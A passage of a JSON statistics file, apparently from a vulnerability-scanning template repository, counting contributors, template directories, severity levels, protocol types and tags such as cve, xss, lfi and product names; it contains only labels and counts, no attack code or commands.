nentwig","count":2},{"name":"cocxanh","count":2},{"name":"arcc","count":2},{"name":"w4cky_","count":2},{"name":"bp0lr","count":2},{"name":"joeldeleep","count":2},{"name":"0xsmiley","count":2},{"name":"koti2","count":2},{"name":"r3naissance","count":2},{"name":"_c0wb0y_","count":1},{"name":"d0rkerdevil","count":1},{"name":"izn0u","count":1},{"name":"0xrod","count":1},{"name":"jeya seelan","count":1},{"name":"fmunozs","count":1},{"name":"j33n1k4","count":1},{"name":"mhdsamx","count":1},{"name":"yavolo","count":1},{"name":"mesaglio","count":1},{"name":"ahmed sherif","count":1},{"name":"rojanrijal","count":1},{"name":"remonsec","count":1},{"name":"alph4byt3","count":1},{"name":"alex","count":1},{"name":"sy3omda","count":1},{"name":"pratik khalane","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"knassar702","count":1},{"name":"bolli95","count":1},{"name":"0ut0fb4nd","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"thevillagehacker","count":1},{"name":"iampritam","count":1},{"name":"c3l3si4n","count":1},{"name":"ohlinge","count":1},{"name":"mah3sec_","count":1},{"name":"exploitation","count":1},{"name":"mass0ma","count":1},{"name":"elder tao","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"0h1in9e","count":1},{"name":"@dwisiswant0","count":1},{"name":"toufik airane","count":1},{"name":"adrianmf","count":1},{"name":"kabirsuda","count":1},{"name":"affix","count":1},{"name":"andysvints","count":1},{"name":"ringo","count":1},{"name":"ajaysenr","count":1},{"name":"x6263","count":1},{"name":"sullo","count":1},{"name":"wabafet","count":1},{"name":"zandros0","count":1},{"name":"pdp","count":1},{"name":"ldionmarcil","count":1},{"name":"th3.d1p4k","count":1},{"name":"sicksec","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"b0rn2r00t","count":1},{"name":"sickwell","count":1},{"name":"aresx","count":1},{"name":"un-fmunozs","count":1},{"name":"flag007","count":1},{"name":"tim_koopmans","count":1},{"name":"mubassirpatel","count":1},{"name":"patralos","count":1},{"name":"divya_mudgal","count":1},{"name":"rodnt","count":1},{"name":"brabbit10","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"regala_","count":1},{"name":"notsoevilweasel","count":1},{"name":"0xteles","count":1},{"name":"rotemreiss","count":1},{"name":"jteles","count":1},{"name":"petruknisme","count":1},{"name":"nerrorsec","count":1},{"name":"luci","count":1},{"name":"pudsec","count":1},{"name":"_darrenmartyn","count":1},{"name":"alperenkesk","count":1},{"name":"bad5ect0r","count":1},{"name":"me9187","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"vzamanillo","count":1},{"name":"smaranchand","count":1},{"name":"s1r1u5_","count":1},{"name":"borna nematzadeh","count":1},{"name":"infosecsanyam","count":1},{"name":"philippdelteil","count":1},{"name":"ahmetpergamum","count":1},{"name":"undefl0w","count":1},{"name":"fopina","count":1},{"name":"omarkurt","count":1},{"name":"xstp","count":1},{"name":"52971","count":1},{"name":"willd96","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"taielab","count":1},{"name":"becivells","count":1},{"name":"hanlaomo","count":1},{"name":"bjhulst","count":1},{"name":"kareemse1im","count":1},{"name":"yashgoti","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"nytr0gen","count":1},{"name":"manuelbua","count":1},{"name":"defr0ggy","count":1},{"name":"whynotke","count":1},{"name":"shelld3v","count":1},{"name":"luskabol","count":1},{"name":"shreyapohekar","count":1},{"name":"cookiehanhoan","count":1},{"name":"thezakman","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"juicypotato1","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"naglinagli","count":1},{"name":"kurohost","count":1},{"name":"blckraven","count":1},{"name":"furkansenan","count":1},{"name":"apt-mirror","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"micha3lb3n","count":1},{"name":"0xtavian","count":1},{"name":"_harleo","count":1},{"name":"yashanand155","count":1},{"name":"b0yd","count":1},{"name":"zhenwarx","count":1},{"name":"push4d","count":1},{"name":"raesene","count":1},{"name":"schniggie","count":1},{"name":"andirrahmani1","count":1},{"name":"ipanda","count":1},{"name":"ilovebinbash","count":1},{"name":"deena","count":1},{"name":"qlkwej","count":1},{"name":"its0x08","count":1},{"name":"soyelmago","count":1},{"name":"sec_hawk","count":1},{"name":"hakluke","count":1},{"name":"intx0x80","count":1},{"name":"geraldino2","count":1},{"name":"absshax","count":1},{"name":"streetofhackerr007","count":1},{"name":"chron0x","count":1},{"name":"udyz","count":1},{"name":"berkdusunur","count":1},{"name":"b4uh0lz","count":1},{"name":"sshell","count":1},{"name":"co0nan","count":1},{"name":"noamrathaus","count":1},{"name":"gboddin","count":1},{"name":"ooooooo_q","count":1},{"name":"dawid-czarnecki","count":1},{"name":"elmahdi","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"revblock","count":1},{"name":"shifacyclewla","count":1},{"name":"kre80r","count":1},{"name":"akshansh","count":1},{"name":"retr0","count":1},{"name":"evolutionsec","count":1},{"name":"daviey","count":1},{"name":"tirtha_mandal","count":1},{"name":"akash.c","count":1},{"name":"makyotox","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1}],"directory":[{"name":"cves","count":725},{"name":"vulnerabilities","count":301},{"name":"exposed-panels","count":247},{"name":"technologies","count":191},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":36},{"name":"network","count":32},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":643},{"name":"high","count":553},{"name":"medium","count":448},{"name":"critical","count":273},{"name":"low","count":152}],"types":[{"name":"http","count":1965},{"name":"file","count":46},{"name":"network","count":41},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":739},{"name":"lfi","count":266},{"name":"panel","count":252},{"name":"xss","count":248},{"name":"wordpress","count":235},{"name":"exposure","count":233},{"name":"rce","count":200},{"name":"tech","count":183},{"name":"cve2020","count":164},{"name":"wp-plugin","count":161},{"name":"cve2021","count":138},{"name":"cve2019","count":96},{"name":"config","count":94},{"name":"cve2018","count":86},{"name":"joomla","count":79},{"name":"apache","count":70},{"name":"cve2010","count":69},{"name":"takeover","count":68},{"name":"iot","count":66},{"name":"token","count":65},{"name":"default-login","count":63},{"name":"oob","count":55},{"name":"cve2017","count":50},{"name":"unauth","count":47},{"name":"file","count":46},{"name":"network","count":42},{"name":"sqli","count":38},{"name":"ssrf","count":37},{"name":"","count":37},{"name":"oracle","count":36},{"name":"cve2016","count":36},{"name":"redirect","count":34},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2015","count":24},{"name":"misc","count":23},{"name":"disclosure","count":22},{"name":"auth-bypass","count":21},{"name":"generic","count":20},{"name":"cisco","count":20},{"name":"router","count":19},{"name":"cve2014","count":19},{"name":"aem","count":19},{"name":"misconfig","count":18},{"name":"sap","count":18},{"name":"debug","count":18},{"name":"springboot","count":18},{"name":"php","count":16},{"name":"cve2012","count":14},{"name":"cve2011","count":14},{"name":"login","count":14},{"name":"fuzz","count":14},{"name":"weblogic","count":14},{"name":"struts","count":14},{"name":"android","count":13},{"name":"dns","count":13},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"devops","count":13},{"name":"aws","count":12},{"name":"dlink","count":12},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"wp-theme","count":11},{"name":"cve2013","count":11},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"intrusive","count":9},{"name":"magento","count":9},{"name":"ftp","count":9},{"name":"airflow","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"vmware","count":8},{"name":"ruijie","count":8},{"name":"scada","count":8},{"name":"cnvd","count":8},{"name":"nginx","count":8},{"name":"backup","count":7},{"name":"confluence","count":7},{"name":"cms","count":7},{"name":"cve2009","count":7},{"name":"files","count":7},{"name":"google","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"ibm","count":7},{"name":"kubernetes","count":7},{"name":"microsoft","count":7},{"name":"camera","count":6},{"name":"rconfig","count":6},{"name":"docker","count":6},{"name":"laravel","count":6},{"name":"solr","count":6},{"name":"cve2008","count":6},{"name":"jetty","count":6},{"name":"citrix","count":6},{"name":"django","count":6},{"name":"api","count":6},{"name":"drupal","count":5},{"name":"windows","count":5},{"name":"headless","count":5},{"name":"deserialization","count":5},{"name":"printer","count":5},{"name":"circarlife","count":5},{"name":"jolokia","count":5},{"name":"tomcat","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"ssti","count":5},{"name":"hp","count":5},{"name":"fileupload","count":5},{"name":"nodejs","count":5},{"name":"phpmyadmin","count":5},{"name":"lucee","count":5},{"name":"dedecms","count":5},{"name":"grafana","count":4},{"name":"resin","count":4},{"name":"firmware","count":4},{"name":"solarwinds","count":4},{"name":"wso2","count":4},{"name":"hongdian","count":4},{"name":"zimbra","count":4},{"name":"glpi","count":4},{"name":"thinkphp","count":4},{"name":"artifactory","count":4},{"name":"samsung","count":4},{"name":"symfony","count":4},{"name":"magmi","count":4},{"name":"thinkcmf","count":4},{"name":"zabbix","count":4},{"name":"strapi","count":4},{"name":"git","count":4},{"name":"traversal","count":4},{"name":"webserver","count":4},{"name":"symantec","count":4},{"name":"moodle","count":4},{"name":"elastic","count":4},{"name":"rfi","count":4},{"name":"proxy","count":4},{"name":"buffalo","count":4},{"name":"vpn","count":4},{"name":"crlf","count":4},{"name":"asp","count":4},{"name":"exchange","count":4},{"name":"tikiwiki","count":3},{"name":"bitrix","count":3},{"name":"mongodb","count":3},{"name":"vbulletin","count":3},{"name":"targa","count":3},{"name":"caucho","count":3},{"name":"slack","count":3},{"name":"firebase","count":3},{"name":"hoteldruid","count":3},{"name":"jellyfin","count":3},{"name":"injection","count":3},{"name":"springcloud","count":3},{"name":"prometheus","count":3},{"name":"opensis","count":3},{"name":"openam","count":3},{"name":"backups","count":3},{"name":"fpd","count":3},{"name":"cacti","count":3},{"name":"itop","count":3},{"name":"ssh","count":3},{"name":"smtp","count":3},{"name":"telerik","count":3},{"name":"kevinlab","count":3},{"name":"azure","count":3},{"name":"nosqli","count":3},{"name":"zhiyuan","count":3},{"name":"nacos","count":3},{"name":"mail","count":3},{"name":"microstrategy","count":3},{"name":"amazon","count":3},{"name":"linkerd","count":3},{"name":"r-seenet","count":3},{"name":"kafka","count":3},{"name":"ebs","count":3},{"name":"log","count":3},{"name":"npm","count":3},{"name":"httpd","count":3},{"name":"ofbiz","count":3},{"name":"oa","count":3},{"name":"openssh","count":3},{"name":"kibana","count":3},{"name":"jeesns","count":3},{"name":"fanruan","count":3},{"name":"druid","count":3},{"name":"terramaster","count":3},{"name":"nexus","count":3},{"name":"lfr","count":3},{"name":"bigip","count":3},{"name":"totemomail","count":2},{"name":"nextcloud","count":2},{"name":"leak","count":2},{"name":"activemq","count":2},{"name":"natshell","count":2},{"name":"pega","count":2},{"name":"hashicorp","count":2},{"name":"ecology","count":2},{"name":"igs","count":2},{"name":"voipmonitor","count":2},{"name":"splunk","count":2},{"name":"xxljob","count":2},{"name":"linux","count":2},{"name":"dolibarr","count":2},{"name":"geowebserver","count":2},{"name":"paloalto","count":2},{"name":"prtg","count":2},{"name":"showdoc","count":2},{"name":"axis2","count":2},{"name":"kentico","count":2},{"name":"sonarqube","count":2},{"name":"rstudio","count":2},{"name":"openfire","count":2},{"name":"service","count":2},{"name":"jsf","count":2},{"name":"horde","count":2},{"name":"dos","count":2},{"name":"ilo","count":2},{"name":"mida","count":2},{"name":"hostheader-injection","count":2},{"name":"bypass","count":2},{"name":"wordfence","count":2},{"name":"emerge","count":2},{"name":"sonicwall","count":2},{"name":"hjtcloud","count":2},{"name":"node","count":2},{"name":"waf","count":2},{"name":"seeyon","count":2},{"name":"akkadian","count":2},{"name":"sharepoint","count":2},{"name":"akamai","count":2},{"name":"idrac","count":2},{"name":"chamilo","count":2},{"name":"avantfax","count":2},{"name":"cve2005","count":2},{"name":"minio","count":2},{"name":"yapi","count":2},{"name":"rockmongo","count":2},{"name":"getsimple","count":2},{"name":"favicon","count":2},{"name":"nagios","count":2},{"name":"glassfish","count":2},{"name":"cache","count":2},{"name":"yii","count":2},{"name":"icewarp","count":2},{"name":"openvpn","count":2},{"name":"ucmdb","count":2},{"name":"trixbox","count":2},{"name":"ecoa","count":2},{"name":"ec2","count":2},{"name":"backdoor","count":2},{"name":"flir","count":2},{"name":"frp","count":2},{"name":"vrealize","count":2},{"name":"odoo","count":2},{"name":"commax","count":2},{"name":"grav","count":2},{"name":"oauth","count":2},{"name":"wuzhicms","count":2},{"name":"keycloak","count":2},{"name":"plesk","count":2},{"name":"jeedom","count":2},{"name":"storage","count":2},{"name":"db","count":2},{"name":"globalprotect","count":2},{"name":"jboss","count":2},{"name":"bucket","count":2},{"name":"github","count":2},{"name":"netsweeper","count":2},{"name":"status","count":2},{"name":"qcubed","count":2},{"name":"fortios","count":2},{"name":"enumeration","count":2},{"name":"axis","count":2},{"name":"adminer","count":2},{"name":"mcafee","count":2},{"name":"guacamole","count":2},{"name":"spark","count":2},{"name":"maian","count":2},{"name":"webcam","count":2},{"name":"kong","count":2},{"name":"liferay","count":2},{"name":"shellshock","count":2},{"name":"hasura","count":2},{"name":"netis","count":2},{"name":"harbor","count":2},{"name":"nextjs","count":2},{"name":"middleware","count":2},{"name":"huawei","count":2},{"name":"bruteforce","count":2},{"name":"sitecore","count":2},{"name":"phpcollab","count":2},{"name":"smb","count":2},{"name":"cve2007","count":2},{"name":"hpe","count":2},{"name":"saltstack","count":2},{"name":"prestashop","count":2},{"name":"couchdb","count":2},{"name":"aruba","count":2},{"name":"chiyu","count":2},{"name":"beanshell","count":1},{"name":"livezilla","count":1},{"name":"plone","count":1},{"name":"alertmanager","count":1},{"name":"sqlite","count":1},{"name":"gespage","count":1},{"name":"circontrorl","count":1},{"name":"embedthis","count":1},{"name":"dom","count":1},{"name":"pacsone","count":1},{"name":"fortinet","count":1},{"name":"tjws","count":1},{"name":"resourcespace","count":1},{"name":"zyxel","count":1},{"name":"olivetti","count":1},{"name":"netgenie","count":1},{"name":"arl","count":1},{"name":"javafaces","count":1},{"name":"basic-auth","count":1},{"name":"meraki","count":1},{"name":"wing-ftp","count":1},{"name":"postgres","count":1},{"name":"pcoip","count":1},{"name":"vcenter","count":1},{"name":"sourcebans","count":1},{"name":"bolt","count":1},{"name":"rdp","count":1},{"name":"cockpit","count":1},{"name":"triconsole","count":1},{"name":"bazarr","count":1},{"name":"rujjie","count":1},{"name":"xmlchart","count":1},{"name":"lotuscms","count":1},{"name":"huijietong","count":1},{"name":"phpwiki","count":1},{"name":"clink-office","count":1},{"name":"tongda","count":1},{"name":"gogs","count":1},{"name":"nomad","count":1},{"name":"feifeicms","count":1},{"name":"tieline","count":1},{"name":"realteo","count":1},{"name":"linksys","count":1},{"name":"servicedesk","count":1},{"name":"dnssec","count":1},{"name":"gateone","count":1},{"name":"blind","count":1},{"name":"concrete","count":1},{"name":"kafdrop","count":1},{"name":"mdb","count":1},{"name":" default-login","count":1},{"name":"announcekit","count":1},{"name":"acontent","count":1},{"name":"okta","count":1},{"name":"pgadmin","count":1},{"name":"shoppable","count":1},{"name":"adb","count":1},{"name":"centreon","count":1},{"name":"shopware","count":1},{"name":"dvwa","count":1},{"name":"shoretel","count":1},{"name":"asus","count":1},{"name":"expressjs","count":1},{"name":"tcexam","count":1},{"name":"artica","count":1},{"name":"calendarix","count":1},{"name":"perl","count":1},{"name":"csod","count":1},{"name":"phpfusion","count":1},{"name":"b2evolution","count":1},{"name":"twitter-server","count":1},{"name":"octobercms","count":1},{"name":"websphere","count":1},{"name":"timesheet","count":1},{"name":"bedita","count":1},{"name":"oidc","count":1},{"name":"alerta","count":1},{"name":"ns","count":1},{"name":"circontrol","count":1},{"name":"mantisbt","count":1},{"name":"jfrog","count":1},{"name":"webftp","count":1},{"name":"clickhouse","count":1},{"name":"cloudinary","count":1},{"name":"centos","count":1},{"name":"mautic","count":1},{"name":"tectuus","count":1},{"name":"xml","count":1},{"name":"werkzeug","count":1},{"name":"diris","count":1},{"name":"pippoint","count":1},{"name":"wazuh","count":1},{"name":"gsoap","count":1},{"name":"bash","count":1},{"name":"vscode","count":1},{"name":"trane","count":1},{"name":"webmodule-ee","count":1},{"name":"database","count":1},{"name":"sql","count":1},{"name":"ambari","count":1},{"name":"checkpoint","count":1},{"name":"zms","count":1},{"name":"cscart","count":1},{"name":"rabbitmq","count":1},{"name":"wondercms","count":1},{"name":"smi","count":1},{"name":"sentry","count":1},{"name":"wamp","count":1},{"name":"hadoop","count":1},{"name":"gitea","count":1},{"name":"robomongo","count":1},{"name":"servicenow","count":1},{"name":"mpsec","count":1},{"name":"csrf","count":1},{"name":"labtech","count":1},{"name":"cofax","count":1},{"name":"listserv","count":1},{"name":"zm","count":1},{"name":"craftcms","count":1},{"name":"terraform","count":1},{"name":"jaspersoft","count":1},{"name":"wmt","count":1},{"name":"lutron","count":1},{"name":"xiuno","count":1},{"name":"burp","count":1},{"name":"opensmtpd","count":1},{"name":"vidyo","count":1},{"name":"portainer","count":1},{"name":"redwood","count":1},{"name":"cloudflare","count":1},{"name":"razor","count":1},{"name":"socomec","count":1},{"name":"ueditor","count":1},{"name":"codeigniter","count":1},{"name":"svn","count":1},{"name":"rubedo","count":1},{"name":"totaljs","count":1},{"name":"eyelock","count":1},{"name":"etherpad","count":1},{"name":"emby","count":1},{"name":"tika","count":1},{"name":"lanproxy","count":1},{"name":"ghost","count":1},{"name":"natemail","count":1},{"name":"fastapi","count":1},{"name":"sangfor","count":1},{"name":"mrtg","count":1},{"name":"tensorflow","count":1},{"name":"metabase","count":1},{"name":"starttls","count":1},{"name":"szhe","count":1},{"name":"rocketchat","count":1},{"name":"sar2html","count":1},{"name":"netrc","count":1},{"name":"office365","count":1},{"name":"chyrp","count":1},{"name":"skywalking","count":1},{"name":"viewlinc","count":1},{"name":"turbocrm","count":1},{"name":"chinaunicom","count":1},{"name":"mailchimp","count":1},{"name":"viewpoint","count":1},{"name":"shiro","count":1},{"name":"ilo4","count":1},{"name":"oscommerce","count":1},{"name":"wildfly","count":1},{"name":"pmb","count":1},{"name":"aspnuke","count":1},{"name":"clockwork","count":1},{"name":"spectracom","count":1},{"name":"redcap","count":1},{"name":"iceflow","count":1},{"name":"cse","count":1},{"name":"sureline","count":1},{"name":"74cms","count":1},{"name":"nuuo","count":1},{"name":"mysql","count":1},{"name":"redhat","count":1},{"name":"phpfastcache","count":1},{"name":"argussurveillance","count":1},{"name":"traefik","count":1},{"name":"mariadb","count":1},{"name":"simplecrm","count":1},{"name":"clave","count":1},{"name":"auth","count":1},{"name":"spring","count":1},{"name":"fortilogger","count":1},{"name":"hiawatha","count":1},{"name":"gilacms","count":1},{"name":"avtech","count":1},{"name":"shopizer","count":1},{"name":"lg-nas","count":1},{"name":"krweb","count":1},{"name":"metinfo","count":1},{"name":"hiboss","count":1},{"name":"ognl","count":1},{"name":"addpac","count":1},{"name":"redis","count":1},{"name":"glances","count":1},{"name":"zzzcms","count":1},{"name":"primetek","count":1},{"name":"woocommerce","count":1},{"name":"springframework","count":1},{"name":"xvr","count":1},{"name":"owasp","count":1},{"name":"tpshop","count":1},{"name":"selea","count":1},{"name":"anchorcms","count":1},{"name":"zarafa","count":1},{"name":"dotnetnuke","count":1},{"name":"iptime","count":1},{"name":"fastcgi","count":1},{"name":"yealink","count":1},{"name":"motorola","count":1},{"name":"gloo","count":1},{"name":"webadmin","count":1},{"name":"h3c-imc","count":1},{"name":"kyan","count":1},{"name":"dbeaver","count":1},{"name":"nweb2fax","count":1},{"name":"extractor","count":1},{"name":"moinmoin","count":1},{"name":"kubeflow","count":1},{"name":"eprints","count":1},{"name":"panasonic","count":1},{"name":"frontpage","count":1},{"name":"ecom","count":1},{"name":"elasticsearch","count":1},{"name":"apiman","count":1},{"name":"karel","count":1},{"name":"goahead","count":1},{"name":"nuxeo","count":1},{"name":"crm","count":1},{"name":"grails","count":1},{"name":"tor","count":1},{"name":"biometrics","count":1},{"name":"plastic","count":1},{"name":"zookeeper","count":1},{"name":"expn","count":1},{"name":"fortigates","count":1},{"name":"woocomernce","count":1},{"name":"sgp","count":1},{"name":"clockwatch","count":1},{"name":"salesforce","count":1},{"name":"ssl","count":1},{"name":"graphite","count":1},{"name":"kerbynet","count":1},{"name":"nps","count":1},{"name":"netmask","count":1},{"name":"tileserver","count":1},{"name":"novnc","count":1},{"name":"appweb","count":1},{"name":"majordomo2","count":1},{"name":"haproxy","count":1},{"name":"glowroot","count":1},{"name":"redmine","count":1},{"name":"nedi","count":1},{"name":"linkedin","count":1},{"name":"gurock","count":1},{"name":"nifi","count":1},{"name":"sarg","count":1},{"name":"apos","count":1},{"name":"whm","count":1},{"name":"tracer","count":1},{"name":"phpinfo","count":1},{"name":"clusterengine","count":1},{"name":"thinkadmin","count":1},{"name":"opensns","count":1},{"name":"couchbase","count":1},{"name":"scimono","count":1},{"name":"memcached","count":1},{"name":"blue-ocean","count":1},{"name":"jeewms","count":1},{"name":"fortiweb","count":1},{"name":"zte","count":1},{"name":"sco","count":1},{"name":"qsan","count":1},{"name":"dvr","count":1},{"name":"dotclear","count":1},{"name":"alibaba","count":1},{"name":"hortonworks","count":1},{"name":"daybyday","count":1},{"name":"myvuehelp","count":1},{"name":"default","count":1},{"name":"etouch","count":1},{"name":"processmaker","count":1},{"name":"discord","count":1},{"name":"proftpd","count":1},{"name":"lotus","count":1},{"name":"cerebro","count":1},{"name":"comodo","count":1},{"name":"miscrsoft","count":1},{"name":"duomicms","count":1},{"name":"xdcms","count":1},{"name":"tidb","count":1},{"name":"payara","count":1},{"name":"k8s","count":1},{"name":"darkstat","count":1},{"name":"rhymix","count":1},{"name":"st","count":1},{"name":"logontracer","count":1},{"name":"sidekiq","count":1},{"name":"sophos","count":1},{"name":"javascript","count":1},{"name":"ems","count":1},{"name":"wiki","count":1},{"name":"landrayoa","count":1},{"name":"heroku","count":1},{"name":"keenetic","count":1},{"name":"zeroshell","count":1},{"name":"maccmsv10","count":1},{"name":"emc","count":1},{"name":"sceditor","count":1},{"name":"nordex","count":1},{"name":"parentlink","count":1},{"name":"landray","count":1},{"name":"varnish","count":1},{"name":"fuelcms","count":1},{"name":"kindeditor","count":1},{"name":"dompdf","count":1},{"name":"acme","count":1},{"name":"idemia","count":1},{"name":"upload","count":1},{"name":"chevereto","count":1},{"name":"gotmls","count":1},{"name":"moin","count":1},{"name":"pulsesecure","count":1},{"name":"commscope","count":1},{"name":"soar","count":1},{"name":"mediumish","count":1},{"name":"webmin","count":1},{"name":"api-manager","count":1},{"name":"lighttpd","count":1},{"name":"lansweeper","count":1},{"name":"yachtcontrol","count":1},{"name":"nexusdb","count":1},{"name":"opencast","count":1},{"name":"exponentcms","count":1},{"name":"pihole","count":1},{"name":"openerp","count":1},{"name":"fortigate","count":1},{"name":"ulterius","count":1},{"name":"myucms","count":1},{"name":"openrestry","count":1},{"name":"jquery","count":1},{"name":"rsyncd","count":1},{"name":"klog","count":1},{"name":"webui","count":1},{"name":"visualtools","count":1},{"name":"exacqvision","count":1},{"name":"monitorix","count":1},{"name":"upnp","count":1},{"name":"empirecms","count":1},{"name":"solarlog","count":1},{"name":"avalanche","count":1},{"name":"node-red-dashboard","count":1},{"name":"tenda","count":1},{"name":"expose","count":1},{"name":"gitlist","count":1},{"name":"synnefo","count":1},{"name":"plugin","count":1},{"name":"ruby","count":1},{"name":"zcms","count":1},{"name":"zmanda","count":1},{"name":"bitly","count":1},{"name":"solman","count":1},{"name":"codemeter","count":1},{"name":"visionhub","count":1},{"name":"qvisdvr","count":1},{"name":"exposures","count":1},{"name":"nimble","count":1},{"name":"panabit","count":1},{"name":"maxsite","count":1},{"name":"mara","count":1},{"name":"nette","count":1},{"name":"smartblog","count":1},{"name":"owa","count":1},{"name":"smartsense","count":1},{"name":"plc","count":1},{"name":"netdata","count":1},{"name":"pyramid","count":1},{"name":"rmi","count":1},{"name":"mobileiron","count":1},{"name":"octoprint","count":1},{"name":"cocoon","count":1},{"name":"wavlink","count":1},{"name":"cve2006","count":1},{"name":"htmli","count":1},{"name":"ioncube","count":1},{"name":"flink","count":1},{"name":"eyou","count":1},{"name":"nc2","count":1},{"name":"drone","count":1},{"name":"stem","count":1},{"name":"swagger","count":1},{"name":"bullwark","count":1},{"name":"cloudron","count":1},{"name":"spidercontrol","count":1},{"name":"geddy","count":1},{"name":"froxlor","count":1},{"name":"scs","count":1},{"name":"opentsdb","count":1},{"name":"timeclock","count":1},{"name":"blackboard","count":1},{"name":"azkaban","count":1},{"name":"svnserve","count":1},{"name":"fedora","count":1},{"name":"postmessage","count":1},{"name":"actuator","count":1},{"name":"spf","count":1},{"name":"dotnet","count":1},{"name":"optiLink","count":1},{"name":"mirai","count":1},{"name":"ewebs","count":1},{"name":"magicflow","count":1},{"name":"nsasg","count":1},{"name":"setup","count":1},{"name":"mongoshake","count":1},{"name":"minimouse","count":1},{"name":"xunchi","count":1},{"name":"seacms","count":1},{"name":"shopxo","count":1},{"name":"s3","count":1},{"name":"interlib","count":1},{"name":"gstorage","count":1},{"name":"fiori","count":1},{"name":"email","count":1},{"name":"uwsgi","count":1},{"name":"vsphere","count":1},{"name":"testrail","count":1},{"name":"domxss","count":1},{"name":"vsftpd","count":1},{"name":"acexy","count":1},{"name":"faraday","count":1},{"name":"accela","count":1},{"name":"jenzabar","count":1},{"name":"sage","count":1},{"name":"panos","count":1},{"name":"ganglia","count":1},{"name":"bigbluebutton","count":1},{"name":"cgi","count":1},{"name":"eg","count":1},{"name":"rmc","count":1},{"name":"gridx","count":1},{"name":"wooyun","count":1},{"name":"cherokee","count":1},{"name":"sprintful","count":1},{"name":"openstack","count":1},{"name":"lancom","count":1},{"name":"omi","count":1},{"name":"subrion","count":1},{"name":"oneblog","count":1},{"name":"discourse","count":1},{"name":"phalcon","count":1},{"name":"graphql","count":1},{"name":"zenario","count":1},{"name":"javamelody","count":1},{"name":"elascticsearch","count":1},{"name":"saltapi","count":1},{"name":"powercreator","count":1},{"name":"jsp","count":1},{"name":"mantis","count":1},{"name":"openx","count":1},{"name":"bookstack","count":1},{"name":"elfinder","count":1},{"name":"esmtp","count":1},{"name":"monitorr","count":1},{"name":"weiphp","count":1},{"name":"xampp","count":1},{"name":"achecker","count":1},{"name":"ricoh","count":1},{"name":"ruckus","count":1},{"name":"camunda","count":1},{"name":"cyberoam","count":1},{"name":"tapestry","count":1},{"name":"mongo","count":1},{"name":"zend","count":1},{"name":"wifisky","count":1},{"name":"episerver","count":1},{"name":"cors","count":1},{"name":"tensorboard","count":1},{"name":"doh","count":1},{"name":"geutebruck","count":1},{"name":"wavemaker","count":1},{"name":"openemr","count":1},{"name":"tamronos","count":1},{"name":"influxdb","count":1},{"name":"qdpm","count":1},{"name":"aura","count":1},{"name":"erp-nc","count":1},{"name":"trilithic","count":1},{"name":"pagespeed","count":1},{"name":"jenkin","count":1},{"name":"finereport","count":1},{"name":"spip","count":1},{"name":"ntopng","count":1},{"name":"imap","count":1},{"name":"gunicorn","count":1},{"name":"vnc","count":1},{"name":"k8","count":1},{"name":"jnoj","count":1},{"name":"jmx","count":1},{"name":"floc","count":1},{"name":"opm","count":1},{"name":"phpunit","count":1},{"name":"luftguitar","count":1},{"name":"beanstalk","count":1},{"name":"jitsi","count":1},{"name":"websvn","count":1},{"name":"ssltls","count":1},{"name":"cobub","count":1},{"name":"graylog","count":1},{"name":"rockethchat","count":1}],"authors":[{"name":"pikpikcu","count":273},{"name":"dhiyaneshdk","count":268},{"name":"daffainfo","count":217},{"name":"pdteam","count":195},{"name":"geeknik","count":154},{"name":"dwisiswant0","count":131},{"name":"gy741","count":76},{"name":"pussycat0x","count":69},{"name":"princechaddha","count":61},{"name":"madrobot","count":61},{"name":"0x_akoko","count":43},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"hackergautam","count":9},{"name":"nadino","count":9},{"name":"melbadry9","count":9},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"dogasantos","count":7},{"name":"harshbothra_","count":7},{"name":"oppsec","count":7},{"name":"randomstr1ng","count":7},{"name":"techryptic 